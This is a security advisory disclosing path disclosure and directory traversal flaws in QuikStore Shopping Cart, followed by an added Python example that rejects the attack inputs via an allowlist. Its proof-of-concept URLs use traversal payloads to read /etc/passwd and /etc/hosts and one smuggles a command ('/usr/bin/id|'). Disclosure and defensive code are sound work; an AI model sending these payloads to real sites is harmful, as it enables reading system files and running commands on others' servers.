Indonesia Security Development Team Advisory

QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users
=====================================================================

Advisory Name: QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users
Release Date: 5:08 23/12/03
Application: QuikStore Shopping Cart
Author: Dr`Ponidi
Discovered by: Dr`Ponidi
Acknowledgments: Vulnerability discovery, exploit code, and advisory by Dr`Ponidi
Vendor Status: The vendor has been contacted
Vendor URL: http://www.quikstore.com
Reference: http://drponidi.5u.com/advisory.htm
Greetz to: #indohack #k-elektronik #dhegleng @ dal.net

[Details]
A remote user can reportedly send a request that causes the system to display an error message that indicates the installation path. A malformed HTTP request for many of the files in QuikStore Shopping Cart triggers an error, and the resulting error message discloses potentially sensitive installation path information to the remote attacker.

QuikStore Shopping Cart also allows remote file reading: users can view files on the system with the privileges of the web server.

[Proof of Concept]
http://[target]/cgi-bin/quikstore.cgi?store='
http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../etc/passwd%00.html
http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../../../etc/hosts
http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../../../usr/bin/id|

[Suggestions]
Filter all files

[Patch:]
Not yet available

[About Indonesia Security Development Team]
Indonesia Security Development Team researches and develops intelligent, advanced application security assessment. Based in Indonesia, Indonesia Security Development Team offers the best of breed security consulting services, specializing in shopping carts software and network security assessments.
We provide security information and patches for use by the entire network security community. This information is provided freely to all interested parties and may be redistributed provided that it is not altered in any way, and that the author is appropriately credited.

Indonesia Security Development Team Advisory: http://drponidi.5u.com/advisory.htm
_______________________________________________________________
Dr`Ponidi

Original document can be found at http://drponidi.5u.com/advisory.htm
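
One way to apply the "Filter all files" suggestion to the template parameter, shown as an added example that is not part of the original advisory or of QuikStore's own code. It is written in Python for illustration; the names resolve_template, error_body and the template directory are hypothetical, and the sample directory is constructed.

```python
import os
import re
import tempfile

# Allowlist: a bare file name, no directory separators, fixed extension.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.html")


def resolve_template(template_dir, requested):
    """Return the real path of an allowed template, or None if rejected.

    template_dir and requested are hypothetical names: the directory that
    holds the store's templates and the decoded 'template' query value.
    """
    # 1. Syntactic allowlist. fullmatch() rejects "../", an embedded NUL
    #    (the decoded %00), a trailing "|" and any path separator.
    if not isinstance(requested, str) or not _SAFE_NAME.fullmatch(requested):
        return None
    # 2. Containment check after resolving symlinks, so a link placed
    #    inside the template directory cannot point outside it.
    base = os.path.realpath(template_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    # 3. Only existing regular files are served.
    return candidate if os.path.isfile(candidate) else None


def error_body(_exc):
    """Generic error text: never echo the path or the exception string."""
    return "The requested page is not available."


def demo():
    """Run the advisory's template values through the check."""
    with tempfile.TemporaryDirectory() as d:  # constructed template dir
        with open(os.path.join(d, "main.html"), "w") as fh:
            fh.write("<html></html>")
        samples = [
            "main.html",
            "../../../../../../../../../../etc/passwd\x00.html",
            "../../../../../../../../../../../../etc/hosts",
            "../../../../../../../../../../../../usr/bin/id|",
        ]
        return [resolve_template(d, s) is not None for s in samples]


if __name__ == "__main__":
    print(demo())
```

Only the constructed main.html is accepted; the three template values from the proof of concept are rejected at the allowlist step before any file-system call is made.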